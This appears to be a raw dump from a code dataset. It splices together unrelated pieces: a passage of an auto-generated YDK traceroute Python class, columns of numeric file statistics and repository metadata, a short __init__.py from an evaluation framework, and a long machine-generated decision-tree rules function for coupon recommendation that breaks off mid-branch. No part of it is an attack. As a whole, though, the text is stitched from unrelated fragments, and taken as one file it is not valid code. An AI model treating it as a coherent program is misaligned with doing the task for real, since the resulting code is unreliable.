('hop_address', (YLeaf(YType.str, 'hop-address'), ['str'])),
('hop_hostname', (YLeaf(YType.str, 'hop-hostname'), ['str'])),
])
self.probe_index = None
self.result = None
self.delta_time = None
self.hop_address = None
self.hop_hostname = None
self._segment_path = lambda: "probe" + "[probe-index='" + str(self.probe_index) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes.Probe, [u'probe_index', u'result', u'delta_time', u'hop_address', u'hop_hostname'], name, value)
def clone_ptr(self):
    """Create a fresh top-level Traceroute entity, cache it on this
    instance as ``_top_entity``, and return it."""
    entity = Traceroute()
    self._top_entity = entity
    return entity
| 39.966606
| 235
| 0.427907
| 3,508
| 44,283
| 5.152794
| 0.047605
| 0.054879
| 0.095928
| 0.0343
| 0.923434
| 0.907004
| 0.890518
| 0.88919
| 0.886811
| 0.885484
| 0
| 0.018681
| 0.466906
| 44,283
| 1,107
| 236
| 40.00271
| 0.747024
| 0.179685
| 0
| 0.78125
| 0
| 0.008929
| 0.121795
| 0.026965
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075893
| false
| 0
| 0.011161
| 0
| 0.131696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d7aeca3909a080d92affaa8fafc5c6564b034b0
| 204
|
py
|
Python
|
evaluation_framework/EntityRelatedness/__init__.py
|
nheist/Evaluation-Framework
|
0561fcbca5025f280624c02f6fad24a888c653ab
|
[
"Apache-2.0"
] | 2
|
2020-08-01T07:12:00.000Z
|
2022-02-10T10:19:11.000Z
|
evaluation_framework/EntityRelatedness/__init__.py
|
nheist/Evaluation-Framework
|
0561fcbca5025f280624c02f6fad24a888c653ab
|
[
"Apache-2.0"
] | null | null | null |
evaluation_framework/EntityRelatedness/__init__.py
|
nheist/Evaluation-Framework
|
0561fcbca5025f280624c02f6fad24a888c653ab
|
[
"Apache-2.0"
] | null | null | null |
from evaluation_framework.EntityRelatedness.entityRelatedness_model import EntityRelatednessModel
from evaluation_framework.EntityRelatedness.entityRelatedness_taskManager import EntityRelatednessManager
| 68
| 105
| 0.941176
| 16
| 204
| 11.75
| 0.5625
| 0.148936
| 0.244681
| 0.425532
| 0.606383
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 204
| 2
| 106
| 102
| 0.959184
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
7dc06d3f6b15f5990790bf4048cdb9403eddb0e5
| 315,260
|
py
|
Python
|
duke-cs671-fall21-coupon-recommendation/outputs/rules/ID3/13_features/maxdepth_5/4/rules.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/ID3/13_features/maxdepth_5/4/rules.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/ID3/13_features/maxdepth_5/4/rules.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
def findDecision(obj): #obj[0]: Passanger, obj[1]: Time, obj[2]: Coupon, obj[3]: Gender, obj[4]: Age, obj[5]: Children, obj[6]: Education, obj[7]: Occupation, obj[8]: Bar, obj[9]: Coffeehouse, obj[10]: Restaurant20to50, obj[11]: Direction_same, obj[12]: Distance
# {"feature": "Coupon", "instances": 8148, "metric_value": 0.4751, "depth": 1}
if obj[2]>1:
# {"feature": "Coffeehouse", "instances": 5867, "metric_value": 0.461, "depth": 2}
if obj[9]>0.0:
# {"feature": "Distance", "instances": 4415, "metric_value": 0.44, "depth": 3}
if obj[12]<=2:
# {"feature": "Passanger", "instances": 3980, "metric_value": 0.4296, "depth": 4}
if obj[0]<=2:
# {"feature": "Gender", "instances": 2590, "metric_value": 0.4529, "depth": 5}
if obj[3]>0:
# {"feature": "Occupation", "instances": 1404, "metric_value": 0.4705, "depth": 6}
if obj[7]>1.5272800515844427:
# {"feature": "Time", "instances": 1149, "metric_value": 0.4764, "depth": 7}
if obj[1]<=3:
# {"feature": "Children", "instances": 937, "metric_value": 0.482, "depth": 8}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 490, "metric_value": 0.4898, "depth": 9}
if obj[10]>0.0:
# {"feature": "Bar", "instances": 418, "metric_value": 0.4829, "depth": 10}
if obj[8]>0.0:
# {"feature": "Education", "instances": 309, "metric_value": 0.4772, "depth": 11}
if obj[6]<=2:
# {"feature": "Age", "instances": 232, "metric_value": 0.4783, "depth": 12}
if obj[4]<=4:
# {"feature": "Direction_same", "instances": 210, "metric_value": 0.4861, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Direction_same", "instances": 22, "metric_value": 0.3955, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Direction_same", "instances": 77, "metric_value": 0.4596, "depth": 12}
if obj[11]<=0:
# {"feature": "Age", "instances": 40, "metric_value": 0.3947, "depth": 13}
if obj[4]<=1:
return 'False'
elif obj[4]>1:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Age", "instances": 37, "metric_value": 0.456, "depth": 13}
if obj[4]<=1:
return 'False'
elif obj[4]>1:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[8]<=0.0:
# {"feature": "Education", "instances": 109, "metric_value": 0.4152, "depth": 11}
if obj[6]<=3:
# {"feature": "Age", "instances": 92, "metric_value": 0.4548, "depth": 12}
if obj[4]<=5:
# {"feature": "Direction_same", "instances": 87, "metric_value": 0.4807, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[4]>5:
return 'True'
else: return 'True'
elif obj[6]>3:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.1008, "depth": 12}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
# {"feature": "Age", "instances": 7, "metric_value": 0.2286, "depth": 13}
if obj[4]>0:
return 'True'
elif obj[4]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Bar", "instances": 72, "metric_value": 0.4709, "depth": 10}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 43, "metric_value": 0.4921, "depth": 11}
if obj[11]<=0:
# {"feature": "Education", "instances": 26, "metric_value": 0.4872, "depth": 12}
if obj[6]>0:
# {"feature": "Age", "instances": 20, "metric_value": 0.5, "depth": 13}
if obj[4]<=1:
return 'True'
elif obj[4]>1:
return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Age", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[4]<=4:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Age", "instances": 17, "metric_value": 0.4412, "depth": 12}
if obj[4]<=4:
# {"feature": "Education", "instances": 16, "metric_value": 0.4667, "depth": 13}
if obj[6]<=0:
return 'True'
elif obj[6]>0:
return 'True'
else: return 'True'
elif obj[4]>4:
return 'False'
else: return 'False'
else: return 'True'
elif obj[8]>0.0:
# {"feature": "Education", "instances": 29, "metric_value": 0.4007, "depth": 11}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 21, "metric_value": 0.3152, "depth": 12}
if obj[11]>0:
# {"feature": "Age", "instances": 11, "metric_value": 0.1591, "depth": 13}
if obj[4]<=1:
return 'False'
elif obj[4]>1:
return 'False'
else: return 'False'
elif obj[11]<=0:
# {"feature": "Age", "instances": 10, "metric_value": 0.4762, "depth": 13}
if obj[4]>1:
return 'False'
elif obj[4]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Age", "instances": 8, "metric_value": 0.5, "depth": 12}
if obj[4]<=4:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Age", "instances": 447, "metric_value": 0.4651, "depth": 9}
if obj[4]>2:
# {"feature": "Bar", "instances": 245, "metric_value": 0.4734, "depth": 10}
if obj[8]>0.0:
# {"feature": "Restaurant20to50", "instances": 136, "metric_value": 0.4443, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Education", "instances": 98, "metric_value": 0.415, "depth": 12}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 63, "metric_value": 0.3764, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Direction_same", "instances": 35, "metric_value": 0.4796, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Education", "instances": 38, "metric_value": 0.485, "depth": 12}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[6]>2:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.3937, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Education", "instances": 109, "metric_value": 0.442, "depth": 11}
if obj[6]<=2:
# {"feature": "Restaurant20to50", "instances": 95, "metric_value": 0.4642, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 52, "metric_value": 0.4968, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Direction_same", "instances": 43, "metric_value": 0.4208, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.127, "depth": 12}
if obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.1975, "depth": 13}
if obj[10]<=2.0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[4]<=2:
# {"feature": "Direction_same", "instances": 202, "metric_value": 0.4356, "depth": 10}
if obj[11]<=0:
# {"feature": "Education", "instances": 117, "metric_value": 0.4614, "depth": 11}
if obj[6]<=2:
# {"feature": "Restaurant20to50", "instances": 95, "metric_value": 0.4455, "depth": 12}
if obj[10]>0.0:
# {"feature": "Bar", "instances": 92, "metric_value": 0.4573, "depth": 13}
if obj[8]<=2.0:
return 'True'
elif obj[8]>2.0:
return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Restaurant20to50", "instances": 22, "metric_value": 0.4675, "depth": 12}
if obj[10]>0.0:
# {"feature": "Bar", "instances": 21, "metric_value": 0.4762, "depth": 13}
if obj[8]>0.0:
return 'False'
elif obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[11]>0:
# {"feature": "Bar", "instances": 85, "metric_value": 0.373, "depth": 11}
if obj[8]>0.0:
# {"feature": "Restaurant20to50", "instances": 46, "metric_value": 0.4193, "depth": 12}
if obj[10]>0.0:
# {"feature": "Education", "instances": 42, "metric_value": 0.4223, "depth": 13}
if obj[6]<=2:
return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Restaurant20to50", "instances": 39, "metric_value": 0.2591, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Education", "instances": 38, "metric_value": 0.2314, "depth": 13}
if obj[6]>0:
return 'True'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[10]>2.0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Age", "instances": 212, "metric_value": 0.4272, "depth": 8}
if obj[4]<=3:
# {"feature": "Education", "instances": 139, "metric_value": 0.4453, "depth": 9}
if obj[6]>0:
# {"feature": "Bar", "instances": 96, "metric_value": 0.4837, "depth": 10}
if obj[8]<=2.0:
# {"feature": "Restaurant20to50", "instances": 91, "metric_value": 0.4888, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 57, "metric_value": 0.4953, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 32, "metric_value": 0.4922, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 25, "metric_value": 0.4992, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 34, "metric_value": 0.4714, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 20, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.4592, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.2, "depth": 11}
if obj[10]<=2.0:
return 'False'
elif obj[10]>2.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Restaurant20to50", "instances": 43, "metric_value": 0.32, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Bar", "instances": 26, "metric_value": 0.3671, "depth": 11}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 22, "metric_value": 0.4227, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>1.0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Bar", "instances": 17, "metric_value": 0.1968, "depth": 11}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 13, "metric_value": 0.1282, "depth": 12}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>3:
# {"feature": "Education", "instances": 73, "metric_value": 0.3305, "depth": 9}
if obj[6]<=3:
# {"feature": "Restaurant20to50", "instances": 65, "metric_value": 0.3632, "depth": 10}
if obj[10]<=2.0:
# {"feature": "Bar", "instances": 61, "metric_value": 0.3798, "depth": 11}
if obj[8]<=2.0:
# {"feature": "Children", "instances": 54, "metric_value": 0.3649, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 27, "metric_value": 0.3841, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 27, "metric_value": 0.3457, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Children", "instances": 7, "metric_value": 0.2286, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[10]>2.0:
return 'True'
else: return 'True'
elif obj[6]>3:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=1.5272800515844427:
# {"feature": "Time", "instances": 255, "metric_value": 0.4244, "depth": 7}
if obj[1]>0:
# {"feature": "Education", "instances": 180, "metric_value": 0.4477, "depth": 8}
if obj[6]<=2:
# {"feature": "Restaurant20to50", "instances": 151, "metric_value": 0.4706, "depth": 9}
if obj[10]<=2.0:
# {"feature": "Bar", "instances": 133, "metric_value": 0.476, "depth": 10}
if obj[8]<=0.0:
# {"feature": "Age", "instances": 76, "metric_value": 0.4149, "depth": 11}
if obj[4]>2:
# {"feature": "Children", "instances": 41, "metric_value": 0.3346, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 39, "metric_value": 0.3201, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Direction_same", "instances": 35, "metric_value": 0.4515, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 26, "metric_value": 0.4727, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Children", "instances": 9, "metric_value": 0.3016, "depth": 13}
if obj[5]>0:
return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[8]>0.0:
# {"feature": "Direction_same", "instances": 57, "metric_value": 0.4698, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 41, "metric_value": 0.4345, "depth": 12}
if obj[5]<=0:
# {"feature": "Age", "instances": 29, "metric_value": 0.4939, "depth": 13}
if obj[4]>1:
return 'False'
elif obj[4]<=1:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Age", "instances": 12, "metric_value": 0.2, "depth": 13}
if obj[4]>1:
return 'False'
elif obj[4]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Age", "instances": 16, "metric_value": 0.4087, "depth": 12}
if obj[4]<=3:
# {"feature": "Children", "instances": 9, "metric_value": 0.3444, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[4]>3:
# {"feature": "Children", "instances": 7, "metric_value": 0.4286, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[10]>2.0:
# {"feature": "Age", "instances": 18, "metric_value": 0.3214, "depth": 10}
if obj[4]<=4:
# {"feature": "Children", "instances": 13, "metric_value": 0.2051, "depth": 11}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.3333, "depth": 12}
if obj[11]>0:
# {"feature": "Bar", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[8]<=1.0:
return 'False'
else: return 'False'
elif obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.4667, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[5]<=0:
# {"feature": "Bar", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[8]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[8]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Restaurant20to50", "instances": 29, "metric_value": 0.2436, "depth": 9}
if obj[10]>0.0:
# {"feature": "Age", "instances": 22, "metric_value": 0.1364, "depth": 10}
if obj[4]>0:
return 'True'
elif obj[4]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.3571, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 7, "metric_value": 0.4082, "depth": 12}
if obj[5]<=1:
# {"feature": "Bar", "instances": 7, "metric_value": 0.4082, "depth": 13}
if obj[8]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Age", "instances": 7, "metric_value": 0.4048, "depth": 10}
if obj[4]<=1:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[11]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[5]<=1:
# {"feature": "Bar", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[8]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]<=0:
return 'True'
else: return 'True'
elif obj[4]>1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[8]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Direction_same", "instances": 75, "metric_value": 0.3032, "depth": 8}
if obj[11]<=0:
# {"feature": "Age", "instances": 49, "metric_value": 0.3718, "depth": 9}
if obj[4]>1:
# {"feature": "Education", "instances": 32, "metric_value": 0.2949, "depth": 10}
if obj[6]>0:
# {"feature": "Restaurant20to50", "instances": 21, "metric_value": 0.3048, "depth": 11}
if obj[10]<=2.0:
# {"feature": "Bar", "instances": 20, "metric_value": 0.3059, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Children", "instances": 17, "metric_value": 0.3588, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[8]>0.0:
return 'True'
else: return 'True'
elif obj[10]>2.0:
return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Bar", "instances": 11, "metric_value": 0.1558, "depth": 11}
if obj[8]<=0.0:
# {"feature": "Children", "instances": 7, "metric_value": 0.2449, "depth": 12}
if obj[5]<=1:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[10]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.2075, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Education", "instances": 9, "metric_value": 0.1667, "depth": 11}
if obj[6]<=0:
return 'False'
elif obj[6]>0:
# {"feature": "Children", "instances": 4, "metric_value": 0.25, "depth": 12}
if obj[5]>0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 8, "metric_value": 0.1667, "depth": 11}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[6]<=1:
# {"feature": "Bar", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[8]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[11]>0:
# {"feature": "Age", "instances": 26, "metric_value": 0.0513, "depth": 9}
if obj[4]<=6:
return 'True'
elif obj[4]>6:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[6]>2:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Age", "instances": 1186, "metric_value": 0.4269, "depth": 6}
if obj[4]<=4:
# {"feature": "Occupation", "instances": 902, "metric_value": 0.4416, "depth": 7}
if obj[7]<=19.215025871277074:
# {"feature": "Bar", "instances": 839, "metric_value": 0.4514, "depth": 8}
if obj[8]<=1.0:
# {"feature": "Restaurant20to50", "instances": 442, "metric_value": 0.4284, "depth": 9}
if obj[10]>0.0:
# {"feature": "Education", "instances": 389, "metric_value": 0.4434, "depth": 10}
if obj[6]>0:
# {"feature": "Time", "instances": 301, "metric_value": 0.427, "depth": 11}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 239, "metric_value": 0.4395, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 128, "metric_value": 0.4647, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Children", "instances": 111, "metric_value": 0.4061, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Children", "instances": 62, "metric_value": 0.3511, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 36, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 26, "metric_value": 0.4527, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Time", "instances": 88, "metric_value": 0.4569, "depth": 11}
if obj[1]<=1:
# {"feature": "Children", "instances": 47, "metric_value": 0.4875, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 33, "metric_value": 0.4992, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.4589, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>1:
# {"feature": "Children", "instances": 41, "metric_value": 0.4131, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 22, "metric_value": 0.3936, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 19, "metric_value": 0.432, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Children", "instances": 53, "metric_value": 0.267, "depth": 10}
if obj[5]<=0:
# {"feature": "Education", "instances": 45, "metric_value": 0.22, "depth": 11}
if obj[6]<=0:
# {"feature": "Time", "instances": 25, "metric_value": 0.313, "depth": 12}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 23, "metric_value": 0.3398, "depth": 13}
if obj[11]>0:
return 'True'
elif obj[11]<=0:
return 'True'
else: return 'True'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[6]>0:
# {"feature": "Direction_same", "instances": 20, "metric_value": 0.0909, "depth": 12}
if obj[11]<=0:
# {"feature": "Time", "instances": 11, "metric_value": 0.1515, "depth": 13}
if obj[1]<=1:
return 'True'
elif obj[1]>1:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Time", "instances": 8, "metric_value": 0.1875, "depth": 11}
if obj[1]>1:
return 'True'
elif obj[1]<=1:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.0, "depth": 12}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 397, "metric_value": 0.4662, "depth": 9}
if obj[5]<=0:
# {"feature": "Education", "instances": 286, "metric_value": 0.4792, "depth": 10}
if obj[6]<=3:
# {"feature": "Restaurant20to50", "instances": 268, "metric_value": 0.4734, "depth": 11}
if obj[10]>0.0:
# {"feature": "Time", "instances": 220, "metric_value": 0.4631, "depth": 12}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 162, "metric_value": 0.4722, "depth": 13}
